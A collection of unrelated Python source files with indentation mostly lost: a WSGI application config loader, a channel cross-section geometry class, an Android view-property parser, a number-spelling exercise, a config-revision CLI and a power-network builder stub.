**context.local_conf)
return server_wrapper
else:
assert 0, "Protocol %r unknown" % context.protocol
SERVER = _Server()
# Virtual type: (@@: There's clearly something crufty here;
# this probably could be more elegant)
class _PipeLine(_ObjectType):
name = 'pipeline'
def invoke(self, context):
app = context.app_context.create()
filters = [c.create() for c in context.filter_contexts]
filters.reverse()
for filter_ in filters:
app = filter_(app)
return app
PIPELINE = _PipeLine()
class _FilterApp(_ObjectType):
name = 'filter_app'
def invoke(self, context):
next_app = context.next_context.create()
filter_ = context.filter_context.create()
return filter_(next_app)
FILTER_APP = _FilterApp()
class _FilterWith(_App):
name = 'filtered_with'
def invoke(self, context):
filter_ = context.filter_context.create()
filtered = context.next_context.create()
if context.next_context.object_type is APP:
return filter_(filtered)
else:
# filtering a filter
def composed(app):
return filter_(filtered(app))
return composed
FILTER_WITH = _FilterWith()
############################################################
# Loaders
############################################################
def loadapp(uri, name=None, **kw):
return loadobj(APP, uri, name=name, **kw)
def loadfilter(uri, name=None, **kw):
return loadobj(FILTER, uri, name=name, **kw)
def loadserver(uri, name=None, **kw):
return loadobj(SERVER, uri, name=name, **kw)
def appconfig(uri, name=None, relative_to=None, global_conf=None):
context = loadcontext(APP, uri, name=name,
relative_to=relative_to,
global_conf=global_conf)
return context.config()
_loaders = {}
def loadobj(object_type, uri, name=None, relative_to=None,
global_conf=None):
context = loadcontext(
object_type, uri, name=name, relative_to=relative_to,
global_conf=global_conf)
return context.create()
def loadcontext(object_type, uri, name=None, relative_to=None,
global_conf=None):
if '#' in uri:
if name is None:
uri, name = uri.split('#', 1)
else:
# @@: Ignore fragment or error?
uri = uri.split('#', 1)[0]
if name is None:
name = 'main'
if ':' not in uri:
raise LookupError("URI has no scheme: %r" % uri)
scheme, path = uri.split(':', 1)
scheme = scheme.lower()
if scheme not in _loaders:
raise LookupError(
"URI scheme not known: %r (from %s)"
% (scheme, ', '.join(_loaders.keys())))
return _loaders[scheme](
object_type,
uri, path, name=name, relative_to=relative_to,
global_conf=global_conf)
def _loadconfig(object_type, uri, path, name, relative_to,
global_conf):
isabs = os.path.isabs(path)
# De-Windowsify the paths:
path = path.replace('\\', '/')
if not isabs:
if not relative_to:
raise ValueError(
"Cannot resolve relative uri %r; no relative_to keyword "
"argument given" % uri)
relative_to = relative_to.replace('\\', '/')
if relative_to.endswith('/'):
path = relative_to + path
else:
path = relative_to + '/' + path
if path.startswith('///'):
path = path[2:]
path = unquote(path)
loader = ConfigLoader(path)
if global_conf:
loader.update_defaults(global_conf, overwrite=False)
return loader.get_context(object_type, name, global_conf)
_loaders['config'] = _loadconfig
def _loadegg(object_type, uri, spec, name, relative_to,
global_conf):
loader = EggLoader(spec)
return loader.get_context(object_type, name, global_conf)
_loaders['egg'] = _loadegg
def _loadfunc(object_type, uri, spec, name, relative_to,
global_conf):
loader = FuncLoader(spec)
return loader.get_context(object_type, name, global_conf)
_loaders['call'] = _loadfunc
############################################################
# Loaders
############################################################
class _Loader(object):
def get_app(self, name=None, global_conf=None):
return self.app_context(
name=name, global_conf=global_conf).create()
def get_filter(self, name=None, global_conf=None):
return self.filter_context(
name=name, global_conf=global_conf).create()
def get_server(self, name=None, global_conf=None):
return self.server_context(
name=name, global_conf=global_conf).create()
def app_context(self, name=None, global_conf=None):
return self.get_context(
APP, name=name, global_conf=global_conf)
def filter_context(self, name=None, global_conf=None):
return self.get_context(
FILTER, name=name, global_conf=global_conf)
def server_context(self, name=None, global_conf=None):
return self.get_context(
SERVER, name=name, global_conf=global_conf)
_absolute_re = re.compile(r'^[a-zA-Z]+:')
def absolute_name(self, name):
"""
Returns true if the name includes a scheme
"""
if name is None:
return False
return self._absolute_re.search(name)
class ConfigLoader(_Loader):
def __init__(self, filename):
self.filename = filename = filename.strip()
defaults = {
'here': os.path.dirname(os.path.abspath(filename)),
'__file__': os.path.abspath(filename)
}
self.parser = NicerConfigParser(filename, defaults=defaults)
self.parser.optionxform = str # Don't lower-case keys
with open(filename) as f:
self.parser.read_file(f)
def update_defaults(self, new_defaults, overwrite=True):
for key, value in iteritems(new_defaults):
if not overwrite and key in self.parser._defaults:
continue
self.parser._defaults[key] = value
def get_context(self, object_type, name=None, global_conf=None):
if self.absolute_name(name):
return loadcontext(object_type, name,
relative_to=os.path.dirname(self.filename),
global_conf=global_conf)
section = self.find_config_section(
object_type, name=name)
if global_conf is None:
global_conf = {}
else:
global_conf = global_conf.copy()
defaults = self.parser.defaults()
global_conf.update(defaults)
local_conf = {}
global_additions = {}
get_from_globals = {}
for option in self.parser.options(section):
if option.startswith('set '):
name = option[4:].strip()
global_additions[name] = global_conf[name] = (
self.parser.get(section, option))
elif option.startswith('get '):
name = option[4:].strip()
get_from_globals[name] = self.parser.get(section, option)
else:
if option in defaults:
# @@: It's a global option (?), so skip it
continue
local_conf[option] = self.parser.get(section, option)
for local_var, glob_var in get_from_globals.items():
local_conf[local_var] = global_conf[glob_var]
if object_type in (APP, FILTER) and 'filter-with' in local_conf:
filter_with = local_conf.pop('filter-with')
else:
filter_with = None
if 'require' in local_conf:
for spec in local_conf['require'].split():
pkg_resources.require(spec)
del local_conf['require']
if section.startswith('filter-app:'):
context = self._filter_app_context(
object_type, section, name=name,
global_conf=global_conf, local_conf=local_conf,
global_additions=global_additions)
elif section.startswith('pipeline:'):
context = self._pipeline_app_context(
object_type, section, name=name,
global_conf=global_conf, local_conf=local_conf,
global_additions=global_additions)
elif 'use' in local_conf:
context = self._context_from_use(
object_type, local_conf, global_conf, global_additions,
section)
else:
context = self._context_from_explicit(
object_type, local_conf, global_conf, global_additions,
section)
if filter_with is not None:
filter_with_context = LoaderContext(
obj=None,
object_type=FILTER_WITH,
protocol=None,
global_conf=global_conf, local_conf=local_conf,
loader=self)
filter_with_context.filter_context = self.filter_context(
name=filter_with, global_conf=global_conf)
filter_with_context.next_context = context
return filter_with_context
return context
def _context_from_use(self, object_type, local_conf, global_conf,
global_additions, section):
use = local_conf.pop('use')
context = self.get_context(
object_type, name=use, global_conf=global_conf)
context.global_conf.update(global_additions)
context.local_conf.update(local_conf)
if '__file__' in global_conf:
# use sections shouldn't overwrite the original __file__
context.global_conf['__file__'] = global_conf['__file__']
# @@: Should loader be overwritten?
context.loader = self
if context.protocol is None:
# Determine protocol from section type
section_protocol = section.split(':', 1)[0]
if section_protocol in ('application', 'app'):
context.protocol = 'paste.app_factory'
elif section_protocol in ('composit', 'composite'):
context.protocol = 'paste.composit_factory'
else:
# This will work with 'server' and 'filter', otherwise it
# could fail but there is an error message already for
# bad protocols
context.protocol = 'paste.%s_factory' % section_protocol
return context
def _context_from_explicit(self, object_type, local_conf, global_conf,
global_addition, section):
possible = []
for protocol_options in object_type.egg_protocols:
for protocol in protocol_options:
if protocol in local_conf:
possible.append((protocol, local_conf[protocol]))
break
if len(possible) > 1:
raise LookupError(
"Multiple protocols given in section %r: %s"
% (section, possible))
if not possible:
raise LookupError(
"No loader given in section %r" % section)
found_protocol, found_expr = possible[0]
del local_conf[found_protocol]
value = import_string(found_expr)
context = LoaderContext(
value, object_type, found_protocol,
global_conf, local_conf, self)
return context
def _filter_app_context(self, object_type, section, name,
global_conf, local_conf, global_additions):
if 'next' not in local_conf:
raise LookupError(
"The [%s] section in %s is missing a 'next' setting"
% (section, self.filename))
next_name = local_conf.pop('next')
context = LoaderContext(None, FILTER_APP, None, global_conf,
local_conf, self)
context.next_context = self.get_context(
APP, next_name, global_conf)
if 'use' in local_conf:
context.filter_context = self._context_from_use(
FILTER, local_conf, global_conf, global_additions,
section)
else:
context.filter_context = self._context_from_explicit(
FILTER, local_conf, global_conf, global_additions,
section)
return context
def _pipeline_app_context(self, object_type, section, name,
global_conf, local_conf, global_additions):
if 'pipeline' not in local_conf:
raise LookupError(
"The [%s] section in %s is missing a 'pipeline' setting"
% (section, self.filename))
pipeline = local_conf.pop('pipeline').split()
if local_conf:
raise LookupError(
"The [%s] pipeline section in %s has extra "
"(disallowed) settings: %s"
                % (section, self.filename, ', '.join(local_conf.keys())))
context = LoaderContext(None, PIPELINE, None, global_conf,
local_conf, self)
context.app_context = self.get_context(
APP, pipeline[-1], global_conf)
context.filter_contexts = [
self.get_context(FILTER, pname, global_conf)
for pname in pipeline[:-1]]
return context
def find_config_section(self, object_type, name=None):
"""
Return the section name with the given name prefix (following the
        same pattern as ``protocol_desc`` in ``config``). It must have the
given name, or for ``'main'`` an empty name is allowed. The
prefix must be followed by a ``:``.
Case is *not* ignored.
"""
possible = []
for name_options in object_type.config_prefixes:
for name_prefix in name_options:
found = self._find_sections(
self.parser.sections(), name_prefix, name)
if found:
possible.extend(found)
break
if not possible:
raise LookupError(
"No section %r (prefixed by %s) found in config %s"
% (name,
' or '.join(map(repr, _flatten(object_type.config_prefixes))),
self.filename))
if len(possible) > 1:
raise LookupError(
"Ambiguous section names %r for section %r (prefixed by %s) "
"found in config %s"
% (possible, name,
' or '.join(map(repr, _flatten(object_type.config_prefixes))),
self.filename))
return possible[0]
def _find_sections(self, sections, name_prefix, name):
found = []
if name is None:
if name_prefix in sections:
found.append(name_prefix)
name = 'main'
for section in sections:
if section.startswith(name_prefix + ':'):
if section[len(name_prefix) + 1:].strip() == name:
found.append(section)
return found
class EggLoader(_Loader):
def __init__(self, spec):
self.spec = spec
def get_context(self, object_type, name=None, global_conf=None):
if self.absolute_name(name):
return loadcontext(object_type, name,
global_conf=global_conf)
entry_point, protocol, ep_name = self.find_egg_entry_point(
object_type, name=name)
return LoaderContext(
entry_point,
object_type,
protocol,
global_conf or {}, {},
self,
distribution=pkg_resources.get_distribution(self.spec),
entry_point_name=ep_name)
def find_egg_entry_point(self, object_type, name=None):
"""
        Return the ``(entry_point, protocol, name)`` tuple for the entry
        point with the given ``name``.
"""
if name is None:
name = 'main'
possible = []
for protocol_options in object_type.egg_protocols:
for protocol in protocol_options:
pkg_resources.require(self.spec)
entry = pkg_resources.get_entry_info(
self.spec,
protocol,
name)
if entry is not None:
possible.append((entry.load(), protocol, entry.name))
break
if not possible:
# Better exception
dist = pkg_resources.get_distribution(self.spec)
raise LookupError(
"Entry point %r not found in egg %r (dir: %s; protocols: %s; "
"entry_points: %s)"
% (name, self.spec,
dist.location,
', '.join(_flatten(object_type.egg_protocols)),
', '.join(_flatten([
list((pkg_resources.get_entry_info(self.spec, prot, name) or {}).keys())
for prot in protocol_options] or '(no entry points)'))))
if len(possible) > 1:
raise LookupError(
"Ambiguous entry points for %r in egg %r (protocols: %s)"
% (name, self.spec, ', '.join(_flatten(protocol_options))))
return possible[0]
class FuncLoader(_Loader):
""" Loader that supports specifying functions inside modules, without
using eggs at all. Configuration should be in the format:
use = call:my.module.path:function_name
Dot notation is supported in both the module and function name, e.g.:
use = call:my.module.path:object.method
"""
def __init__(self, spec):
self.spec = spec
if ':' not in spec:
raise LookupError("Configuration not in format module:function")
def get_context(self, object_type, name=None, global_conf=None):
obj = lookup_object(self.spec)
return LoaderContext(
obj,
object_type,
None, # determine protocol from section type
global_conf or {},
{},
self,
)
class LoaderContext(object):
def __init__(self, obj, object_type, protocol,
global_conf, local_conf, loader,
distribution=None, entry_point_name=None):
self.object = obj
self.object_type = object_type
self.protocol = protocol
# assert protocol in _flatten(object_type.egg_protocols), (
# "Bad protocol %r; should be one of %s"
# % (protocol, ', '.join(map(repr, _flatten(object_type.egg_protocols)))))
self.global_conf = global_conf
self.local_conf = local_conf
self.loader = loader
self.distribution = distribution
self.entry_point_name = entry_point_name
def create(self):
return self.object_type.invoke(self)
def config(self):
conf = AttrDict(self.global_conf)
conf.update(self.local_conf)
conf.local_conf = self.local_conf
conf.global_conf = self.global_conf
conf.context = self
return conf
class AttrDict(dict):
"""
A dictionary that can be assigned to.
"""
pass
|
python
|
from numpy import sin, cos, pi, fabs, sign, roll, arctan2, diff, cumsum, hypot, logical_and, where, linspace
from scipy import interpolate
import matplotlib.pyplot as plt
# Cross-section class that stores x, y points for the cross-section
# and calculates various geometry data
d = 1000
class CrossSection:
"""
Class that contains geometry of and measurements of a cross-section.
Parameters
----------
x : x-coordinates of cross-section
y : y-coordinates of cross-section
Attributes
----------
x : x-coordinates of cross-section
y : y-coordinates of cross-section
xm : coordinates x[i-1]
xp : coordinates x[i+1]
ym : coordinates y[i-1]
yp : coordinates y[i+1]
A : cross-sectional area
P : cross-section perimeter
    l : distance between x[i], y[i] and x[i+1], y[i+1]
r_l : distance between x, y and reference point
umx : x-coordinate of reference point
umy : y-coordinate of reference point
"""
# Number of points that define the cross-section
def __init__(self, x, y):
self.x = x
self.y = y
self.roll()
# Sets the point of maximum velocity
def setUMPoint(self, umx, umy):
"""
Sets umx, umy.
Parameters
----------
umx : x-coordinate of reference point
umy : y-coordinate of reference point
"""
self.umx = umx
self.umy = umy
# Create arrays of x+1, y+1, x-1, x+1
def roll(self):
"""Creates xm, xp, ym, yp.
"""
self.xm = roll(self.x, 1)
self.ym = roll(self.y, 1)
self.xp = roll(self.x, self.x.size-1)
self.yp = roll(self.y, self.y.size-1)
# Calculate perimeter and area
def calcShapeParams(self):
self.genL()
self.calcA()
    # l stores the distance between adjacent perimeter points
# pp is the length along perimeter to a point
# pp[-2] is the channel perimeter
def genL(self):
"""
Creates l and P.
"""
self.l = hypot(self.x - self.xp, self.y - self.yp)
self.pp = cumsum(self.l)
self.P = self.pp[-2]
# Calculates area of the cross-section
def calcA(self):
"""
Creates A.
"""
self.sA = (self.xm*self.y - self.x*self.ym).sum() * 0.5
self.A = fabs(self.sA)
# Generate lengths from maximum velocity point to perimeter points
def genRL(self):
"""
Creates r_l.
"""
self.r_l = hypot(self.x-self.umx, self.y-self.umy)
# Find left and right points defining a height above the cross-section
# bottom
def findLR(self, h):
"""
Finds left and right index given a height above the
lowest point in the cross-section.
Parameters
----------
h : height above the floor
Returns
-------
L : left index of x, y coordinate h above the floor
R : right index of x, y coordinate h above the floor
"""
ymin = self.y.min()
a_h = ymin + h
condL = logical_and(self.y > a_h, a_h > self.yp)
condR = logical_and(self.y < a_h, a_h < self.yp)
L = where(condL)[0][0] + 1
R = where(condR)[0][0]
return L,R
# Find centroid, maximum velocity position in phreatic cases
def findCentroid(self):
"""
Calculates centroid of the cross-section.
Returns
-------
cx : x-coordinate of centroid
cy : y-coordinate of centroid
"""
m = self.xm*self.y-self.x*self.ym
cx = (1/(6*self.sA))*((self.x + self.xm)*m).sum()
cy = (1/(6*self.sA))*((self.y + self.ym)*m).sum()
return cx, cy
# Redraw some length rl away normal to the perimeter
# It may be advantageous for stability to resample using a spline fit
# Setting dl sets the number of points defining the cross-section
## after resampling.
def redraw(self, rl, resample=False, dl=d):
"""
Regenerate cross-section perpendicular to current
given a distance for each x,y point.
Parameters
----------
rl : array of distances to move x, y points
resample : [bool] option to resample points equidistantly along
perimeter (optional)
dl : number of points in resampled cross-section (optional)
"""
alpha = arctan2(self.xp-self.xm, self.yp-self.ym)
nx = self.x + sign(self.x)*rl*cos(alpha)
ny = self.y - sign(self.x)*rl*sin(alpha)
# Check if we drew inside or outside..
c = ccw(self.x, self.y, self.xm, self.ym, nx, ny)
nx[c] = (self.x - sign(self.x)*rl*cos(alpha))[c]
ny[c] = (self.y + sign(self.x)*rl*sin(alpha))[c]
#Resample points by fitting spline
if resample:
tck, u = interpolate.splprep([nx, ny], u=None, k=1, s=0.0)
un = linspace(u.min(), u.max(), dl if dl!=nx.size else nx.size)
nx, ny = interpolate.splev(un, tck, der=0)
# New coordinates
y_roll = ny.size - ny.argmax()
nx = roll(nx, y_roll)
ny = roll(ny, y_roll)
self.x = nx
self.y = ny
self.roll()
# Counter clockwise function to determine if we drew points in the correct
# direction
def ccw(x, y, xm, ym, nx, ny):
"""
Determines if redrawn points are counter clockwise in cross-section
Parameters
----------
x : x-coordinates of cross-section
y : y-coordinates of cross-section
xm : x[i-1]
ym : y[i-1]
nx : new x-coordinate
ny : new y-coordinate
Returns
-------
ccw : Array of bools indicating which new points are counter clockwise
"""
return (x - xm) * (ny - ym) > (y - ym) * (nx - xm)
# Calculate length of curve defined by points
def calcL(x,y):
"""
Calculates length of a curve given x,y points
Parameters
----------
x : x-coordinates of points
y : y-coordinates of points
Returns
-------
length : length of curve
"""
sub_lengths = hypot(x[1:] - x[:-1], y[1:] - y[:-1])
sub_sums = cumsum(sub_lengths)
length = sub_sums[-1]
return length
def calcArea(x, y, l=0, r=0):
"""
Calculates area of a polygon given x,y points
Parameters
----------
x : x-coordinates of points defining polygon
y : y-coordinates of points defining polygon
l : left index of subset of points (optional)
r : right index of subset of points (optional)
Returns
-------
A - area of polygon
"""
if l and r:
sA = (roll(x[l:r],1)*y[l:r] - x[l:r]*roll(y[l:r],1)).sum()
else:
sA = (roll(x,1)*y - x*roll(y,1)).sum()
return fabs(0.5 * sA)
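# Minimal self-check for the helpers above (synthetic unit-square coordinates, not part of
# the original module): the open polyline 0,0 -> 1,0 -> 1,1 -> 0,1 has length 3 and the
# closed polygon it traces has area 1.
if __name__ == "__main__":
    from numpy import array
    xs = array([0.0, 1.0, 1.0, 0.0])
    ys = array([0.0, 0.0, 1.0, 1.0])
    print(calcL(xs, ys))      # 3.0
    print(calcArea(xs, ys))   # 1.0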
|
python
|
#! python2.7
## -*- coding: utf-8 -*-
## kun for Apk View Tracking
## ParseElement.py
from DeviceManagement.Device import Device
from TreeType import CRect
from Utility import str2int
class ParseElement():
def __init__(self, element_data):
self.class_name = ""
self.hash_code = ""
self.properties_dict = {}
self.element_data = element_data.lstrip(" ")
def getInt(self, string, integer):
try:
return int(self.properties_dict[string])
except:
return integer
def getBoolean(self, string, boolean):
try:
if "false" == self.properties_dict[string]:
return False
elif "true" == self.properties_dict[string]:
return True
else:
return boolean
except:
return boolean
def loadProperties(self, data):
i = 0
data_length =len(data)
while True:
if i >= data_length:
break
key_sep_index = data.index("=", i)
key = data[i : key_sep_index]
value_length_sep_index = data.index(",", key_sep_index+1)
value_length = int(data[key_sep_index+1 : value_length_sep_index])
i = value_length_sep_index + 1 + value_length
value = data[value_length_sep_index+1 : value_length_sep_index+1+value_length]
self.properties_dict[key] = value
i += 1
self.id = self.properties_dict["mID"]
if "mLeft" in self.properties_dict.keys():
self.left = self.getInt("mLeft", 0)
else:
self.left = self.getInt("layout:mLeft", 0)
if "mRight" in self.properties_dict.keys():
self.right = self.getInt("mRight", 0)
else:
self.right = self.getInt("layout:mRight", 0)
if "mTop" in self.properties_dict.keys():
self.top = self.getInt("mTop", 0)
else:
self.top = self.getInt("layout:mTop", 0)
if "mBottom" in self.properties_dict.keys():
self.bottom = self.getInt("mBottom", 0)
else:
self.bottom = self.getInt("layout:mBottom", 0)
if "getWidth()" in self.properties_dict.keys():
self.width = self.getInt("getWidth()", 0)
else:
self.width = self.getInt("layout:getWidth()", 0)
if "getHeight()" in self.properties_dict.keys():
self.height = self.getInt("getHeight()", 0)
else:
self.height = self.getInt("layout:getHeight()", 0)
if "mScrollX" in self.properties_dict.keys():
self.scrollX = self.getInt("mScrollX", 0)
else:
self.scrollX = self.getInt("scrolling:mScrollX", 0)
if "mScrollY" in self.properties_dict.keys():
self.scrollY = self.getInt("mScrollY", 0)
else:
self.scrollY = self.getInt("scrolling:mScrollY", 0)
if "mPaddingLeft" in self.properties_dict.keys():
self.paddingLeft = self.getInt("mPaddingLeft", 0)
else:
self.paddingLeft = self.getInt("padding:mPaddingLeft", 0)
if "mPaddingRight" in self.properties_dict.keys():
self.paddingRight = self.getInt("mPaddingRight", 0)
else:
self.paddingRight = self.getInt("padding:mPaddingRight", 0)
if "mPaddingTop" in self.properties_dict.keys():
self.paddingTop = self.getInt("mPaddingTop", 0)
else:
self.paddingTop = self.getInt("padding:mPaddingTop", 0)
if "mPaddingBottom" in self.properties_dict.keys():
self.paddingBottom = self.getInt("mPaddingBottom", 0)
else:
self.paddingBottom = self.getInt("padding:mPaddingBottom", 0)
if "layout_leftMargin" in self.properties_dict.keys():
self.marginLeft = self.getInt("layout_leftMargin", -2147483648)
else:
self.marginLeft = self.getInt("layout:layout_leftMargin", -2147483648)
if "layout_rightMargin" in self.properties_dict.keys():
self.marginRight = self.getInt("layout_rightMargin", -2147483648)
else:
self.marginRight = self.getInt("layout:layout_rightMargin", -2147483648)
if "layout_topMargin" in self.properties_dict.keys():
self.marginTop = self.getInt("layout_topMargin", -2147483648)
else:
self.marginTop = self.getInt("layout:layout_topMargin", -2147483648)
if "layout_bottomMargin" in self.properties_dict.keys():
self.marginBottom = self.getInt("layout_bottomMargin", -2147483648)
else:
self.marginBottom = self.getInt("layout:layout_bottomMargin", -2147483648)
if "getBaseline()" in self.properties_dict.keys():
self.baseline = self.getInt("getBaseline()", 0)
else:
self.baseline = self.getInt("layout:getBaseline()", 0)
if "willNotDraw()" in self.properties_dict.keys():
self.willNotDraw = self.getBoolean("willNotDraw()", False)
else:
self.willNotDraw = self.getBoolean("drawing:willNotDraw()", False)
if "hasFocus()" in self.properties_dict.keys():
self.hasFocus = self.getBoolean("hasFocus()", False)
else:
self.hasFocus = self.getBoolean("focus:hasFocus()", False)
if "isClickable()" in self.properties_dict.keys():
self.isClickable = self.getBoolean("isClickable()", False)
if "isEnabled()" in self.properties_dict.keys():
self.isEnabled = self.getBoolean("isEnabled()", False)
self.hasMargins = ((self.marginLeft != -2147483648) and (self.marginRight != -2147483648)
and (self.marginTop != -2147483648) and (self.marginBottom != -2147483648))
def parseElmentData(self):
data = self.element_data.lstrip(" ")
sep_index = data.index("@")
self.class_name = data[0 : sep_index]
sub_string = data[sep_index+1 : ]
sep_index = sub_string.index(" ")
self.hash_code = sub_string[0 : sep_index]
sub_string = sub_string[sep_index+1 : ]
self.loadProperties(sub_string)
#===============================================================================
# # get Class Name of View and its Instance Storage Address's Hash Code
# # android.widget.ListView@44ed6480
# # android.widget.TextView@44ed7e08
#===============================================================================
def getClassName(self,):
return self.class_name
#===========================================================================
# # get Hash Code
#===========================================================================
def getHashCode(self):
return self.hash_code
#===============================================================================
# # etc. mID=7,id/sqrt
# # etc. mID=14,id/panelswitch
#===============================================================================
def getID(self):
return self.id
#===============================================================================
# # getVisibility()=n, xxx
# # three states: VISIBLE, GONE,
#===============================================================================
def getVisible(self):
if "getVisibility()" in self.properties_dict.keys():
res = self.properties_dict["getVisibility()"]
# print res
if "VISIBLE" == res:
return True
elif "GONE" == res:
return False
elif "INVISIBLE" == res:
return False
else:
return False
else:
return None
#===============================================================================
# # isClickable()=4,true
# # isClickable()=5,false
#===============================================================================
def getClickable(self):
if "isClickable()" in self.properties_dict.keys():
return self.isClickable
else:
return None
#===============================================================================
# # isEnabled()=4,true
#===============================================================================
def getEnable(self):
if "isEnabled()" in self.properties_dict.keys():
return self.properties_dict["isEnabled()"]
else:
return None
#===============================================================================
# # willNotDraw()=5,false
# # willNotDraw()=4,true
#===============================================================================
def getWillNotDraw(self):
if "willNotDraw()" in self.properties_dict.keys():
return self.properties_dict["willNotDraw()"]
else:
return None
#===============================================================================
# # mPrivateFlags_NOT_DRAWN=3,0x0 false
# # mPrivateFlags_DRAWN=4,0x20 true
#===============================================================================
def getDRAWN(self):
if "mPrivateFlags_DRAWN" in self.properties_dict.keys():
res = self.properties_dict["mPrivateFlags_DRAWN"]
if "0x20" == res:
return True
else:
return None
elif "mPrivateFlags_NOT_DRAWN" in self.properties_dict.keys():
res = self.properties_dict["mPrivateFlags_NOT_DRAWN"]
if "0x0" == res:
return False
else:
return None
else:
return None
#===============================================================================
# # etc. mText=3,log
# # etc. mText=1,√
#===============================================================================
def getText(self):
if "mText" in self.properties_dict.keys():
return self.properties_dict["mText"]
else:
return None
def getRectArea(self):
rect = CRect()
rect.mTop = self.top
rect.mBottom = self.bottom
rect.mLeft = self.left
rect.mRight = self.right
return rect
#===============================================================================
# # this method has not used yet.
#===============================================================================
def getRectMidPoint(self, element):
mid_point = {"x": None,
"y": None}
rect = {"left": None,
"right": None,
"top": None,
"bottom": None}
tag_list = element.split(" ")
for tag in tag_list:
if "mTop=" in tag:
l = tag.split(",")
rect["top"] = l[1]
elif "mBottom=" in tag:
l = tag.split(",")
rect["bottom"] = l[1]
elif "mLeft=" in tag:
l = tag.split(",")
rect["left"] = l[1]
elif "mRight" in tag:
l = tag.split(",")
rect["right"] = l[1]
if (rect["top"]!=None) and (rect["bottom"]!=None) and (rect["left"]!=None) and (rect["right"]!=None):
mid_point["x"] = (str2int(rect["right"])-str2int(rect["left"]))/2.0
mid_point["y"] = (str2int(rect["bottom"])-str2int(rect["top"]))/2.0
return mid_point
if __name__=="__main__":
device = Device()
data = device.getInfosByTelnet("DUMP -1")
    element_parser = ParseElement(data)
    element_parser.parseElmentData()
|
python
|
# Create a program that has a tuple fully populated with the numbers from zero to twenty spelled out in words.
# The program should read a number from the keyboard (between 0 and 20) and print it spelled out.
numeros = ('zero', 'one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine', 'ten', 'eleven', 'twelve', 'thirteen', 'fourteen',
           'fifteen', 'sixteen', 'seventeen', 'eighteen', 'nineteen', 'twenty')
while True:
    c = int(input('Enter a number between 0 and 20: '))
    if 0 <= c <= 20:
        break
    print('Try again!')
print(numeros[c])
|
python
|
import sys
import logging
import logging.handlers
from command_tree import CommandTree, Config
from voidpp_tools.colors import ColoredLoggerFormatter
from .core import Evolution, Chain
from .revision import REVISION_NUMBER_LENGTH
tree = CommandTree(Config(
prepend_double_hyphen_prefix_if_arg_has_default = True,
generate_simple_hyphen_name = {},
))
@tree.root()
@tree.argument(action = 'store_true', help = "log more stuffs")
class Root():
def __init__(self, verbose = False):
logger = logging.getLogger('configpp')
logger.setLevel(logging.DEBUG)
handler = logging.StreamHandler(sys.stdout)
handler.setLevel(logging.DEBUG if verbose else logging.INFO)
handler.setFormatter(ColoredLoggerFormatter(verbose))
logger.addHandler(handler)
@tree.leaf(help = "Initialize a new scripts directory")
@tree.argument(help = "location of scripts directory", nargs = '?')
def init(self, folder = Evolution.DEFAULT_FOLDER):
ev = Evolution()
return 0 if ev.init(folder) else 1
@tree.leaf(help = "Create a new revision file")
@tree.argument(help = "Message")
@tree.argument(help = "a new configpp uri in configpp://TODO format")
def revision(self, message, uri: str = None):
ev = Evolution()
ev.load()
return 0 if ev.revision(message, uri) else 1
@tree.leaf(help = "Upgrade to a later version")
@tree.argument(help = "Target revision", nargs = '?')
def upgrade(self, target = 'head'):
ev = Evolution()
ev.load()
ev.upgrade(target)
return 0
@tree.leaf(help = "List changeset scripts in chronological order")
def history(self):
ev = Evolution()
ev.load()
chain = ev.chain
for id, rev in chain.links.items():
print("{} -> {} : {}".format(rev.parent_id or ' ' * REVISION_NUMBER_LENGTH, rev.id, rev.message))
|
python
|
import os
import pandapower as pp
import pandapower.networks as pn
from pandapower.plotting.plotly import pf_res_plotly
from preparation import NetworkBuilder
import_rules = dict()
aemo_data = r"data/aemo_data_sources.json"
tnsp_buses = r"data/electranet_buses.json"
if __name__ == "__main__":
builder = NetworkBuilder(name="ElectraNet", f_hz=50.0, sn_mva=100)
builder.parse_bus_data(import_rules=tnsp_buses)
builder.build_nodes()
breakpoint()
print(builder)
#pf_res_plotly(net)
|